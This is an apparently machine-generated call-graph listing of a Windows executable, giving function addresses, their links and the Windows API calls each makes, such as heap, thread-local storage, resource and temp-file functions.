4044c9 7721->7722 7723 40e020 4 API calls 7722->7723 7724 4044d3 7723->7724 7725 40dec0 3 API calls 7724->7725 7726 4044dd PathQuoteSpacesW 7725->7726 7727 4044f1 7726->7727 7728 404509 7726->7728 8978 405492 CreateThread 7727->8978 8988 402ca9 7728->8988 7731 404512 8926 40de80 GetLastError TlsGetValue SetLastError 7731->8926 7734 404518 7793 40dfc0 21 API calls 7792->7793 7794 40300e 7793->7794 10167 40de80 GetLastError TlsGetValue SetLastError 7794->10167 7796 403014 10168 40de80 GetLastError TlsGetValue SetLastError 7796->10168 7798 40301c 10169 40de80 GetLastError TlsGetValue SetLastError 7798->10169 7800 403024 10170 40de80 GetLastError TlsGetValue SetLastError 7800->10170 7802 40302c 7803 40d100 8 API calls 7802->7803 7804 40303e 7803->7804 10171 405182 TlsGetValue 7804->10171 7806 403043 7807 405eb0 6 API calls 7806->7807 7808 40304b 7807->7808 7809 40dec0 3 API calls 7808->7809 7810 403055 7809->7810 10172 40de80 GetLastError TlsGetValue SetLastError 7810->10172 7812 40305b 10173 40de80 GetLastError TlsGetValue SetLastError 7812->10173 7814 403063 10174 40de80 GetLastError TlsGetValue SetLastError 7814->10174 7816 40306b 10175 40de80 GetLastError TlsGetValue SetLastError 7816->10175 7818 403073 7819 40d100 8 API calls 7818->7819 7820 403083 7819->7820 10176 405182 TlsGetValue 7820->10176 7822 403088 7823 405eb0 6 API calls 7822->7823 7824 403090 7823->7824 7825 40dec0 3 API calls 7824->7825 7826 40309a 7825->7826 7827 402e9d 35 API calls 7826->7827 7828 4030a2 7827->7828 10177 40de80 GetLastError TlsGetValue SetLastError 7828->10177 7830 4030ac 7831 4021a4 122 API calls 7830->7831 7832 4030b7 7831->7832 7833 4051a0 3 API calls 7832->7833 7834 4030bc 7833->7834 10178 40de80 GetLastError TlsGetValue SetLastError 7834->10178 7836 4030c2 10179 40de80 GetLastError TlsGetValue SetLastError 7836->10179 7838 4030ca 7839 409355 33 API calls 7838->7839 7840 4030dd 7839->7840 7841 40dec0 3 API calls 7840->7841 7842 4030e7 7841->7842 7843 40323e 7842->7843 10180 40de80 GetLastError TlsGetValue SetLastError 7842->10180 7843->7843 7845 4030fe 10181 40de80 GetLastError TlsGetValue SetLastError 7845->10181 7847 403106 10182 40de80 GetLastError TlsGetValue SetLastError 7847->10182 7849 40310e 10183 40de80 GetLastError TlsGetValue SetLastError 7849->10183 7851 403116 7852 40d100 8 API calls 7851->7852 7853 403128 7852->7853 10184 405182 TlsGetValue 7853->10184 7855 40312d 7856 405eb0 6 API calls 7855->7856 7857 403135 7856->7857 7858 40dec0 3 API calls 7857->7858 7859 40313f 7858->7859 10185 40de80 GetLastError TlsGetValue SetLastError 7859->10185 7861 403145 10186 40de80 GetLastError TlsGetValue SetLastError 7861->10186 7863 40314d 10187 40de80 GetLastError TlsGetValue SetLastError 7863->10187 7865 403155 10188 40de80 GetLastError TlsGetValue SetLastError 7865->10188 7867 40315d 7868 40d100 8 API calls 7867->7868 7869 40316f 7868->7869 10189 405182 TlsGetValue 7869->10189 7871 403174 7872 405eb0 6 API calls 7871->7872 7873 40317c 7872->7873 7874 40dec0 3 API calls 7873->7874 7875 403186 7874->7875 10190 40de80 GetLastError TlsGetValue SetLastError 7875->10190 7877 40318c 7878 403cd7 84 API calls 7877->7878 7879 40319c 7878->7879 7880 40dec0 3 API calls 7879->7880 7881 4031a8 7880->7881 10191 40de80 GetLastError TlsGetValue SetLastError 7881->10191 7883 4031ae 7884 403cd7 84 API calls 7883->7884 7885 4031be 7884->7885 7886 40dec0 3 API calls 7885->7886 7887 4031c8 PathAddBackslashW 7886->7887 10192 40de80 GetLastError TlsGetValue SetLastError 7887->10192 7889 4031d7 10193 40de80 GetLastError TlsGetValue SetLastError 7889->10193 7891 4031e7 7892 40e020 4 API calls 7891->7892 7893 4031ef 7892->7893 7894 40e020 4 API calls 7893->7894 7895 4031fb 7894->7895 10194 405182 TlsGetValue 7895->10194 7897 403200 7898 40240c 34 API calls 7897->7898 7899 403208 7898->7899 7900 4051a0 3 API calls 7899->7900 7901 40320d 7900->7901 10195 40de80 GetLastError TlsGetValue SetLastError 7901->10195 7903 403217 7904 40e020 4 API calls 7903->7904 7905 40321f 7904->7905 7906 40dec0 3 API calls 7905->7906 7907 40322b PathRemoveBackslashW 7906->7907 7908 402ca9 141 API calls 7907->7908 7908->7843 7909->7377 7910->7380 7912 40d362 7911->7912 7913 40d3a0 TlsGetValue HeapReAlloc TlsSetValue 7912->7913 7914 40d378 TlsAlloc HeapAlloc TlsSetValue 7912->7914 7915 40d3e0 7913->7915 7916 40d3dc 7913->7916 7914->7913 7921 40db72 HeapAlloc 7915->7921 7916->7915 7917 409674 7916->7917 7920 40d52c HeapAlloc HeapAlloc InitializeCriticalSection 7917->7920 7920->7386 7922 40d3ec 7921->7922 7922->7917 7924 40e141 wcslen 7923->7924 7925 40e1ad 7923->7925 7927 40e176 HeapReAlloc 7924->7927 7928 40e158 HeapAlloc 7924->7928 7926 40e1b5 HeapFree 7925->7926 7929 40e198 7925->7929 7926->7929 7927->7929 7928->7929 7929->7391 7931 409def HeapAlloc 7930->7931 7932 409ed8 7930->7932 7931->7395 7931->7396 7956 40a11a 7932->7956 7934 409ee0 7963 40d946 7934->7963 7937 409f23 HeapFree 7937->7931 7938 409f0f 7939 409f10 HeapFree 7938->7939 7939->7939 7940 409f22 7939->7940 7940->7937 7942 40d83a 7941->7942 7943 40d8f2 RtlAllocateHeap 7942->7943 7944 40d846 7942->7944 7946 40d907 7943->7946 7947 409e76 HeapAlloc 7943->7947 8000 40da43 LoadLibraryW 7944->8000 7946->7947 7949 40d930 InitializeCriticalSection 7946->7949 7947->7400 7949->7947 7950 40d887 HeapAlloc 7952 40d8e5 LeaveCriticalSection 7950->7952 7953 40d89d 7950->7953 7951 40d86b 7951->7950 7951->7952 7952->7947 7954 40d819 6 API calls 7953->7954 7955 40d8b4 7954->7955 7955->7952 7960 40a12e 7956->7960 7957 40a177 memset 7959 40a190 7957->7959 7958 40a139 HeapFree 7958->7960 7959->7934 7960->7957 7960->7958 7976 411d8a 7960->7976 7981 40d74b 7960->7981 7964 40d953 EnterCriticalSection 7963->7964 7965 40d9b8 7963->7965 7966 40d9ae LeaveCriticalSection 7964->7966 7967 40d96f 7964->7967 7991 40d6dd 7965->7991 7970 409ee8 HeapFree HeapFree 7966->7970 7969 40d946 4 API calls 7967->7969 7974 40d979 HeapFree 7969->7974 7970->7937 7970->7938 7972 40d9c4 DeleteCriticalSection 7973 40d9ce HeapFree 7972->7973 7973->7970 7974->7966 7977 411e85 7976->7977 7978 411da2 7976->7978 7977->7960 7978->7977 7980 411d8a HeapFree 7978->7980 7988 40df50 7978->7988 7980->7978 7982 40d758 EnterCriticalSection 7981->7982 7985 40d762 7981->7985 7982->7985 7983 40d814 7983->7960 7984 40d80a LeaveCriticalSection 7984->7983 7986 40d7cb 7985->7986 7987 40d7b5 HeapFree 7985->7987 7986->7983 7986->7984 7987->7986 7989 40df5b HeapFree 7988->7989 7990 40df6e 7988->7990 7989->7990 7990->7978 7992 40d6f5 7991->7992 7993 40d6eb EnterCriticalSection 7991->7993 7994 40d712 7992->7994 7995 40d6fc HeapFree 7992->7995 7993->7992 7996 40d718 HeapFree 7994->7996 7997 40d72e 7994->7997 7995->7994 7995->7995 7996->7996 7996->7997 7998 40d745 7997->7998 7999 40d73b LeaveCriticalSection 7997->7999 7998->7972 7998->7973 7999->7998 8001 40da60 GetProcAddress 8000->8001 8002 40da8b InterlockedCompareExchange 8000->8002 8005 40da80 FreeLibrary 8001->8005 8006 40da70 8001->8006 8003 40da9b 8002->8003 8004 40daaf InterlockedExchange 8002->8004 8007 40d855 EnterCriticalSection 8003->8007 8009 40daa0 Sleep 8003->8009 8004->8007 8005->8002 8005->8007 8006->8005 8007->7951 8009->8003 8011 40a4c6 8010->8011 8015 40a4a7 8010->8015 8012 40a3eb 8011->8012 8013 40d74b 3 API calls 8011->8013 8012->7409 8013->8011 8014 411d8a HeapFree 8014->8015 8015->8012 8015->8014 8016 40d74b 3 API calls 8015->8016 8016->8015 8018 40dbdb 8017->8018 8020 40dd26 8017->8020 8018->7423 8018->7425 8019 40dd51 HeapFree 8019->8018 8020->8019 8021 40dd4f 8020->8021 8022 411d8a HeapFree 8020->8022 8021->8019 8022->8020 8024 40dfea TlsGetValue 8023->8024 8025 40dfcc 8023->8025 8027 402f4d 8024->8027 8028 40dffb 8024->8028 8026 40de30 5 API calls 8025->8026 8029 40dfd1 TlsGetValue 8026->8029 8035 4051a0 8027->8035 8067 40e6a0 HeapAlloc HeapAlloc TlsSetValue 8028->8067 8058 412082 8029->8058 8032 40e000 TlsGetValue 8034 412082 13 API calls 8032->8034 8034->8027 8068 40e780 GetLastError TlsGetValue SetLastError 8035->8068 8037 4051ab 8037->7437 8038->7439 8039->7441 8040->7443 8041->7445 8044 40d12d 8042->8044 8069 40d220 8044->8069 8046 405182 TlsGetValue 8046->7449 8048 405ebd 8047->8048 8079 40e1e0 TlsGetValue 8048->8079 8051 40e260 3 API calls 8052 405ed1 8051->8052 8053 405edd 8052->8053 8081 40e370 TlsGetValue 8052->8081 8055 405f0d 8053->8055 8056 405f00 CharUpperW 8053->8056 8055->7451 8056->7451 8057->7453 8059 412092 TlsAlloc InitializeCriticalSection 8058->8059 8060 4120ae TlsGetValue 8058->8060 8059->8060 8061 4120c4 HeapAlloc 8060->8061 8062 41214b HeapAlloc 8060->8062 8063 40dfe8 8061->8063 8064 4120de EnterCriticalSection 8061->8064 8062->8063 8063->8027 8065 4120f0 7 API calls 8064->8065 8066 4120ee 8064->8066 8065->8062 8066->8065 8067->8032 8068->8037 8070 40d22c 8069->8070 8073 40e260 TlsGetValue 8070->8073 8074 40e27b 8073->8074 8075 40e2a1 HeapReAlloc 8074->8075 8076 40e2d4 8074->8076 8077 402fd9 8075->8077 8076->8077 8078 40e2f0 HeapReAlloc 8076->8078 8077->8046 8078->8077 8080 405ec5 8079->8080 8080->8051 8081->8053 8082->7462 8083->7464 8084->7466 8086 40e260 3 API calls 8085->8086 8087 4096aa GetModuleFileNameW wcscmp 8086->8087 8088 4096e5 8087->8088 8089 4096cd memmove 8087->8089 8155 40e3f0 TlsGetValue 8088->8155 8089->8088 8091 401bc5 8092 405182 TlsGetValue 8091->8092 8092->7470 8093->7480 8094->7482 8095->7484 8096->7486 8097->7488 8098->7491 8100 405e1d 8099->8100 8101 40e1e0 TlsGetValue 8100->8101 8102 405e40 8101->8102 8103 40e260 3 API calls 8102->8103 8104 405e4c 8103->8104 8105 401ce9 8104->8105 8156 40e370 TlsGetValue 8104->8156 8107 405182 TlsGetValue 8105->8107 8107->7496 8157 40d080 8108->8157 8111 405182 TlsGetValue 8111->7500 8112->7506 8114 40e042 8113->8114 8115 40e033 wcslen 8113->8115 8116 40e260 3 API calls 8114->8116 8115->8114 8117 40e04d 8116->8117 8117->7508 8118->7512 8119->7514 8120->7516 8121->7518 8122->7522 8123->7528 8124->7530 8126 405f2e 8125->8126 8127 40e1e0 TlsGetValue 8126->8127 8128 405f4a 8127->8128 8129 40e260 3 API calls 8128->8129 8130 405f56 8129->8130 8132 405f62 8130->8132 8173 40e370 TlsGetValue 8130->8173 8132->7532 8174 40d2e8 TlsGetValue 8133->8174 8138 40de80 GetLastError TlsGetValue SetLastError 8138->7539 8139->7543 8141 40d2e8 16 API calls 8140->8141 8142 409885 8141->8142 8143 40973a 17 API calls 8142->8143 8144 409898 8143->8144 8145 40e260 3 API calls 8144->8145 8146 4098a6 8145->8146 8184 40e3f0 TlsGetValue 8146->8184 8148 401dc9 8149 40e080 TlsGetValue 8148->8149 8149->7551 8185 40e740 TlsGetValue 8150->8185 8152 40516a 8152->7557 8153->7559 8154->7561 8155->8091 8156->8105 8160 40d092 8157->8160 8158 40d0dd 8159 40d220 3 API calls 8158->8159 8161 401cf6 8159->8161 8160->8158 8162 40d0b2 8160->8162 8161->8111 8166 4121a0 8162->8166 8164 40d0b8 8172 412190 free 8164->8172 8167 412214 malloc 8166->8167 8168 4121ac WideCharToMultiByte 8166->8168 8167->8164 8168->8167 8170 4121e0 malloc 8168->8170 8170->8167 8171 4121f2 WideCharToMultiByte 8170->8171 8171->8164 8172->8158 8173->8132 8175 409869 8174->8175 8176 40d2fb HeapAlloc TlsSetValue 8174->8176 8180 40973a 8175->8180 8177 40d327 8176->8177 8178 412082 13 API calls 8177->8178 8179 40d348 8178->8179 8179->8175 8181 40d2e8 16 API calls 8180->8181 8182 40974b GetCommandLineW 8181->8182 8183 401dab 8182->8183 8183->7537 8183->8138 8184->8148 8185->8152 8187 40e260 3 API calls 8186->8187 8188 405dcb 8187->8188 8188->7606 8189->7597 8190->7619 8192 40327b 8191->8192 8192->8192 8193 40dfc0 21 API calls 8192->8193 8194 40328d 8193->8194 8195 4051a0 3 API calls 8194->8195 8196 403296 8195->8196 9053 405060 8196->9053 8199 405060 2 API calls 8200 4032af 8199->8200 9056 402bc1 8200->9056 8203 4032b8 9063 40559a GetVersionExW 8203->9063 8204 4032cb 8207 4032d5 8204->8207 8208 40343b 8204->8208 9069 40de80 GetLastError TlsGetValue SetLastError 8207->9069 9101 40de80 GetLastError TlsGetValue SetLastError 8208->9101 8211 403441 9102 40de80 GetLastError TlsGetValue SetLastError 8211->9102 8212 4032db 9070 40de80 GetLastError TlsGetValue SetLastError 8212->9070 8215 403449 8217 4062c0 3 API calls 8215->8217 8216 4032e3 9071 4062c0 8216->9071 8219 403455 8217->8219 8221 40dec0 3 API calls 8219->8221 8223 40345f GetSystemDirectoryW PathAddBackslashW 8221->8223 8222 40dec0 3 API calls 8224 4032f9 GetWindowsDirectoryW PathAddBackslashW 8222->8224 8226 403439 8223->8226 9074 40de80 GetLastError TlsGetValue SetLastError 8224->9074 9061 40de80 GetLastError TlsGetValue SetLastError 8226->9061 8227 40331a 8229 40e020 4 API calls 8227->8229 8231 403322 8229->8231 8230 403480 8232 40e020 4 API calls 8230->8232 8233 40e020 4 API calls 8231->8233 8234 403488 8232->8234 8236 40332d 8233->8236 9062 405170 TlsGetValue 8234->9062 8238 40dec0 3 API calls 8236->8238 8237 40348f 8240 40df50 HeapFree 8237->8240 8239 403337 PathAddBackslashW 8238->8239 9075 40de80 GetLastError TlsGetValue SetLastError 8239->9075 8242 4034a7 8240->8242 8244 40df50 HeapFree 8242->8244 8243 40334a 8245 40e020 4 API calls 8243->8245 8246 4034af 8244->8246 8247 403352 8245->8247 8248 40df50 HeapFree 8246->8248 8249 40e020 4 API calls 8247->8249 8250 4034b8 8248->8250 8251 40335c 8249->8251 8252 40df50 HeapFree 8250->8252 8253 40dec0 3 API calls 8251->8253 8254 4034c1 8252->8254 8255 403366 8253->8255 8257 40df50 HeapFree 8254->8257 9076 40de80 GetLastError TlsGetValue SetLastError 8255->9076 8259 4034ca 8257->8259 8258 403370 8260 40e020 4 API calls 8258->8260 8259->7625 8261 403378 8260->8261 8262 40e020 4 API calls 8261->8262 8263 403382 8262->8263 8264 40e020 4 API calls 8263->8264 8265 40338c 8264->8265 8266 40dec0 3 API calls 8265->8266 8267 403396 8266->8267 9077 40adc0 8267->9077 8269 4033a4 8270 4033ba 8269->8270 9087 40a9d0 8269->9087 8272 40adc0 11 API calls 8270->8272 8273 4033d2 8272->8273 8274 4033e8 8273->8274 8275 40a9d0 11 API calls 8273->8275 8274->8226 9099 40de80 GetLastError TlsGetValue SetLastError 8274->9099 8275->8274 8277 403404 9100 40de80 GetLastError TlsGetValue SetLastError 8277->9100 8279 40340c 8280 4062c0 3 API calls 8279->8280 8281 403418 8280->8281 8282 40dec0 3 API calls 8281->8282 8283 403422 GetSystemDirectoryW PathAddBackslashW 8282->8283 8283->8226 8284->7631 8285->7633 8286->7635 8287->7637 8288->7641 8289->7647 8290->7649 8291->7651 8292->7653 8293->7657 8295 40dfc0 21 API calls 8294->8295 8296 402eaa 8295->8296 8297 405060 2 API calls 8296->8297 8298 402eb6 FindResourceW 8297->8298 8299 402ed5 8298->8299 8306 402ef1 8298->8306 9157 4026b8 8299->9157 8303 402f00 9154 40e7c0 8303->9154 9151 409ba0 8306->9151 8308 40df50 HeapFree 8309 402f3b 8308->8309 8310 40de80 GetLastError TlsGetValue SetLastError 8309->8310 8310->7665 8312 40dfc0 21 API calls 8311->8312 8313 4021b0 8312->8313 8314 4051a0 3 API calls 8313->8314 8315 4021b9 8314->8315 8316 4021d2 8315->8316 8317 4023ba 8315->8317 9193 40de80 GetLastError TlsGetValue SetLastError 8316->9193 9191 40de80 GetLastError TlsGetValue SetLastError 8317->9191 8320 4021d8 9194 40de80 GetLastError TlsGetValue SetLastError 8320->9194 8321 4023c4 8323 40e020 4 API calls 8321->8323 8325 4023cc 8323->8325 8324 4021e0 9195 40de80 GetLastError TlsGetValue SetLastError 8324->9195 9192 405170 TlsGetValue 8325->9192 8328 4021e8 9196 40de80 GetLastError TlsGetValue SetLastError 8328->9196 8329 4023d3 8331 40df50 HeapFree 8329->8331 8333 4023eb 8331->8333 8332 4021f0 9197 409c10 8332->9197 8335 40df50 HeapFree 8333->8335 8337 4023f4 8335->8337 8336 402204 9206 405182 TlsGetValue 8336->9206 8339 40df50 HeapFree 8337->8339 8342 4023fc 8339->8342 8340 402209 9207 406060 8340->9207 8344 40df50 HeapFree 8342->8344 8346 402405 8344->8346 8345 40dec0 3 API calls 8347 40221b 8345->8347 8346->7668 9210 40de80 GetLastError TlsGetValue SetLastError 8347->9210 8349 402221 9211 40de80 GetLastError TlsGetValue SetLastError 8349->9211 8351 402229 9212 40de80 GetLastError TlsGetValue SetLastError 8351->9212 8353 402231 9213 40de80 GetLastError TlsGetValue SetLastError 8353->9213 8355 402239 8356 409c10 5 API calls 8355->8356 8357 402250 8356->8357 9214 405182 TlsGetValue 8357->9214 8359 402255 8360 406060 5 API calls 8359->8360 8361 40225d 8360->8361 8362 40dec0 3 API calls 8361->8362 8363 402267 8362->8363 9215 40de80 GetLastError TlsGetValue SetLastError 8363->9215 8365 40226d 9216 40de80 GetLastError TlsGetValue SetLastError 8365->9216 8367 402275 9217 40de80 GetLastError TlsGetValue SetLastError 8367->9217 8369 402288 9218 40de80 GetLastError TlsGetValue SetLastError 8369->9218 8371 402290 9219 4057f0 8371->9219 8373 4022a6 9235 40e080 TlsGetValue 8373->9235 8375 4022ab 9236 40de80 GetLastError TlsGetValue SetLastError 8375->9236 8377 4022b1 9237 40de80 GetLastError TlsGetValue SetLastError 8377->9237 8379 4022b9 8380 4057f0 9 API calls 8379->8380 8381 4022cf 8380->8381 9238 405182 TlsGetValue 8381->9238 8383 4022d4 9239 405182 TlsGetValue 8383->9239 8385 4022dc 9240 408f69 8385->9240 8388 40dec0 3 API calls 8389 4022ef 8388->8389 8390 4023b0 8389->8390 8391 402300 8389->8391 8393 401fa9 36 API calls 8390->8393 9282 40de80 GetLastError TlsGetValue SetLastError 8391->9282 8393->8317 8394 402306 9283 40de80 GetLastError TlsGetValue SetLastError 8394->9283 8396 40230e 9284 40de80 GetLastError TlsGetValue SetLastError 8396->9284 8398 40231b 9285 40de80 GetLastError TlsGetValue SetLastError 8398->9285 8400 402323 8401 406060 5 API calls 8400->8401 8402 40232e 8401->8402 9286 405182 TlsGetValue 8402->9286 8404 402333 8405 40d100 8 API calls 8404->8405 8406 40233b 8405->8406 8407 40dec0 3 API calls 8406->8407 8408 402345 8407->8408 8409 4023ae 8408->8409 9287 40de80 GetLastError TlsGetValue SetLastError 8408->9287 8409->8317 8411 40235b 9288 40de80 GetLastError TlsGetValue SetLastError 8411->9288 8413 402368 9289 40de80 GetLastError TlsGetValue SetLastError 8413->9289 8415 402370 8416 4057f0 9 API calls 8415->8416 8417 402386 8416->8417 9290 40e080 TlsGetValue 8417->9290 8419 40238b 9291 405182 TlsGetValue 8419->9291 8421 402396 9292 408e27 8421->9292 8424 4051a0 3 API calls 8425 4023a4 8424->8425 8426 401fa9 36 API calls 8425->8426 8426->8409 8428 40dfc0 21 API calls 8427->8428 8432 401969 8428->8432 8429 4019ea 8431 409ba0 RtlAllocateHeap 8429->8431 8430 40de80 GetLastError TlsGetValue SetLastError 8430->8432 8433 4019f4 8431->8433 8432->8429 8432->8430 8436 405dc0 3 API calls 8432->8436 8443 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8432->8443 8448 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8432->8448 9349 40de80 GetLastError TlsGetValue SetLastError 8433->9349 8435 4019fe 9350 40de80 GetLastError TlsGetValue SetLastError 8435->9350 8436->8432 8438 401a06 9351 40a756 8438->9351 8441 40dec0 3 API calls 8442 401a17 GetTempFileNameW 8441->8442 9360 40de80 GetLastError TlsGetValue SetLastError 8442->9360 8443->8432 8445 401a35 9361 40de80 GetLastError TlsGetValue SetLastError 8445->9361 8447 401a3d 8449 409bc0 4 API calls 8447->8449 8448->8432 8450 401a48 8449->8450 8451 40dec0 3 API calls 8450->8451 8452 401a54 8451->8452 9362 40a7e7 8452->9362 8458 401a8a 9371 40de80 GetLastError TlsGetValue SetLastError 8458->9371 8460 401a92 8461 409bc0 4 API calls 8460->8461 8462 401a9d 8461->8462 8463 40dec0 3 API calls 8462->8463 8464 401aa9 8463->8464 8465 40a7e7 2 API calls 8464->8465 8466 401ab4 8465->8466 8467 40a6c5 3 API calls 8466->8467 8468 401abf GetTempFileNameW PathAddBackslashW 8467->8468 9372 40de80 GetLastError TlsGetValue SetLastError 8468->9372 8470 401aea 9373 40de80 GetLastError TlsGetValue SetLastError 8470->9373 8472 401af2 8473 409bc0 4 API calls 8472->8473 8474 401afd 8473->8474 8475 40dec0 3 API calls 8474->8475 8476 401b09 8475->8476 8477 40a7e7 2 API calls 8476->8477 8478 401b14 PathRenameExtensionW GetTempFileNameW 8477->8478 9374 40de80 GetLastError TlsGetValue SetLastError 8478->9374 8480 401b43 9375 40de80 GetLastError TlsGetValue SetLastError 8480->9375 8482 401b4b 8483 409bc0 4 API calls 8482->8483 8484 401b56 8483->8484 8485 40dec0 3 API calls 8484->8485 8486 401b62 8485->8486 9376 409b80 HeapFree 8486->9376 8488 401b6b 8489 40df50 HeapFree 8488->8489 8490 401b78 8489->8490 8491 40df50 HeapFree 8490->8491 8492 401b81 8491->8492 8493 40df50 HeapFree 8492->8493 8494 401b8a 8493->8494 8495 40460e 8494->8495 8496 40dfc0 21 API calls 8495->8496 8500 40461b 8496->8500 8497 40469c 9383 40de80 GetLastError TlsGetValue SetLastError 8497->9383 8498 40de80 GetLastError TlsGetValue SetLastError 8498->8500 8500->8497 8500->8498 8502 405dc0 3 API calls 8500->8502 8511 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8500->8511 8514 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8500->8514 8501 4046a2 8503 40358d 98 API calls 8501->8503 8502->8500 8504 4046b8 8503->8504 8505 40dec0 3 API calls 8504->8505 8506 4046c2 8505->8506 9384 40a95a 8506->9384 8509 40df50 HeapFree 8510 4046d6 8509->8510 8512 40df50 HeapFree 8510->8512 8511->8500 8513 4046df 8512->8513 8515 40df50 HeapFree 8513->8515 8514->8500 8516 4043c2 8515->8516 8517 40de80 GetLastError TlsGetValue SetLastError 8516->8517 8517->7675 8519 40dfc0 21 API calls 8518->8519 8520 403597 8519->8520 8521 4051a0 3 API calls 8520->8521 8522 4035a0 8521->8522 8523 405060 2 API calls 8522->8523 8524 4035ac 8523->8524 8525 4035b7 8524->8525 8526 4035db 8524->8526 9389 40de80 GetLastError TlsGetValue SetLastError 8525->9389 8527 4035e5 8526->8527 8528 403608 8526->8528 9391 40de80 GetLastError TlsGetValue SetLastError 8527->9391 8531 403612 8528->8531 8532 40363b 8528->8532 9392 40de80 GetLastError TlsGetValue SetLastError 8531->9392 8535 403645 8532->8535 8536 40366e 8532->8536 8533 4035bd 9390 40de80 GetLastError TlsGetValue SetLastError 8533->9390 8534 4035f1 8541 40e020 4 API calls 8534->8541 9410 40de80 GetLastError TlsGetValue SetLastError 8535->9410 8539 4036a1 8536->8539 8540 403678 8536->8540 8548 4036d4 8539->8548 8549 4036ab 8539->8549 9412 40de80 GetLastError TlsGetValue SetLastError 8540->9412 8546 4035f9 8541->8546 8543 403618 9393 40de80 GetLastError TlsGetValue SetLastError 8543->9393 8544 4035c5 8551 40a7f5 5 API calls 8544->8551 8557 40dec0 3 API calls 8546->8557 8547 40364b 9411 40de80 GetLastError TlsGetValue SetLastError 8547->9411 8555 403707 8548->8555 8556 4036de 8548->8556 9414 40de80 GetLastError TlsGetValue SetLastError 8549->9414 8553 4035cc 8551->8553 8552 403620 9394 40a83a 8552->9394 8561 40dec0 3 API calls 8553->8561 8554 40367e 9413 40de80 GetLastError TlsGetValue SetLastError 8554->9413 8567 403711 8555->8567 8568 40373a 8555->8568 9416 40de80 GetLastError TlsGetValue SetLastError 8556->9416 8564 4035d6 8557->8564 8561->8564 9387 40de80 GetLastError TlsGetValue SetLastError 8564->9387 8565 403653 8574 40a83a 17 API calls 8565->8574 8566 4036b1 9415 40de80 GetLastError TlsGetValue SetLastError 8566->9415 9418 40de80 GetLastError TlsGetValue SetLastError 8567->9418 8572 403744 8568->8572 8573 40376d 8568->8573 8570 403686 8581 40a83a 17 API calls 8570->8581 8571 4036e4 9417 40de80 GetLastError TlsGetValue SetLastError 8571->9417 9420 40de80 GetLastError TlsGetValue SetLastError 8572->9420 8578 403777 8573->8578 8579 40379d 8573->8579 8585 40365f 8574->8585 8577 403717 9419 40de80 GetLastError TlsGetValue SetLastError 8577->9419 9422 40de80 GetLastError TlsGetValue SetLastError 8578->9422 8593 4037f5 8579->8593 8594 4037a7 8579->8594 8580 40dec0 3 API calls 8645 403636 8580->8645 8589 403692 8581->8589 8595 40dec0 3 API calls 8585->8595 8586 4036b9 8596 40a83a 17 API calls 8586->8596 8600 40dec0 3 API calls 8589->8600 8590 40381f 8601 40e020 4 API calls 8590->8601 8591 4036ec 8602 40a83a 17 API calls 8591->8602 8592 40374a 9421 40de80 GetLastError TlsGetValue SetLastError 8592->9421 9452 40de80 GetLastError TlsGetValue SetLastError 8593->9452 9424 40de80 GetLastError TlsGetValue SetLastError 8594->9424 8595->8645 8597 4036c5 8596->8597 8606 40dec0 3 API calls 8597->8606 8598 40371f 8607 40a83a 17 API calls 8598->8607 8599 40377d 9423 40de80 GetLastError TlsGetValue SetLastError 8599->9423 8600->8645 8609 403827 8601->8609 8610 4036f8 8602->8610 8606->8645 8615 40372b 8607->8615 9388 405170 TlsGetValue 8609->9388 8618 40dec0 3 API calls 8610->8618 8611 403752 8619 40a83a 17 API calls 8611->8619 8612 4037ad 9425 40de80 GetLastError TlsGetValue SetLastError 8612->9425 8613 4037fb 9453 40de80 GetLastError TlsGetValue SetLastError 8613->9453 8623 40dec0 3 API calls 8615->8623 8616 403785 8624 40a83a 17 API calls 8616->8624 8618->8645 8626 40375e 8619->8626 8621 4037b5 9426 409355 8621->9426 8622 403803 8628 40a7f5 5 API calls 8622->8628 8623->8645 8629 403791 8624->8629 8625 40382e 8631 40df50 HeapFree 8625->8631 8630 40dec0 3 API calls 8626->8630 8633 40380a 8628->8633 8634 40dec0 3 API calls 8629->8634 8630->8645 8635 403846 8631->8635 8637 40dec0 3 API calls 8633->8637 8634->8645 8638 40df50 HeapFree 8635->8638 8636 40dec0 3 API calls 8639 4037d0 8636->8639 8637->8564 8640 40384e 8638->8640 8641 4037e9 8639->8641 8642 4037dd 8639->8642 8640->7678 8644 401fa9 36 API calls 8641->8644 9449 405532 8642->9449 8644->8645 8645->8564 8646->7682 8647->7684 8649 40dfc0 21 API calls 8648->8649 8650 402c04 8649->8650 8651 4051a0 3 API calls 8650->8651 8652 402c0d 8651->8652 8653 405060 2 API calls 8652->8653 8654 402c19 8653->8654 8655 409ba0 RtlAllocateHeap 8654->8655 8656 402c23 GetShortPathNameW 8655->8656 9462 40de80 GetLastError TlsGetValue SetLastError 8656->9462 8658 402c3f 9463 40de80 GetLastError TlsGetValue SetLastError 8658->9463 8660 402c47 8661 409c10 5 API calls 8660->8661 8662 402c57 8661->8662 8663 40dec0 3 API calls 8662->8663 8664 402c61 8663->8664 9464 409b80 HeapFree 8664->9464 8666 402c6a 9465 40de80 GetLastError TlsGetValue SetLastError 8666->9465 8668 402c74 8669 40e020 4 API calls 8668->8669 8670 402c7c 8669->8670 9466 405170 TlsGetValue 8670->9466 8672 402c83 8673 40df50 HeapFree 8672->8673 8674 402c9a 8673->8674 8675 40df50 HeapFree 8674->8675 8676 402ca3 8675->8676 8677 40e080 TlsGetValue 8676->8677 8677->7688 8678->7690 8680 4098c7 SetEnvironmentVariableW 8679->8680 8681 404434 8679->8681 8680->8681 8681->7693 8683->7696 8684->7704 8686 40dfc0 21 API calls 8685->8686 8687 401e5f 8686->8687 8688 4051a0 3 API calls 8687->8688 8689 401e68 8688->8689 9467 40de80 GetLastError TlsGetValue SetLastError 8689->9467 8691 401e6e 9468 40de80 GetLastError TlsGetValue SetLastError 8691->9468 8693 401e76 8694 409698 7 API calls 8693->8694 8695 401e7d 8694->8695 8696 40dec0 3 API calls 8695->8696 8697 401e87 PathQuoteSpacesW 8696->8697 8698 401ee0 8697->8698 8699 401e97 8697->8699 9537 40de80 GetLastError TlsGetValue SetLastError 8698->9537 9471 40de80 GetLastError TlsGetValue SetLastError 8699->9471 8702 401e9d 9472 4024f1 8702->9472 8703 401ee9 8705 40e020 4 API calls 8703->8705 8707 401ef1 8705->8707 8709 40dec0 3 API calls 8707->8709 8708 40dec0 3 API calls 8710 401eae 8708->8710 8711 401ede 8709->8711 9536 40de80 GetLastError TlsGetValue SetLastError 8710->9536 9469 40de80 GetLastError TlsGetValue SetLastError 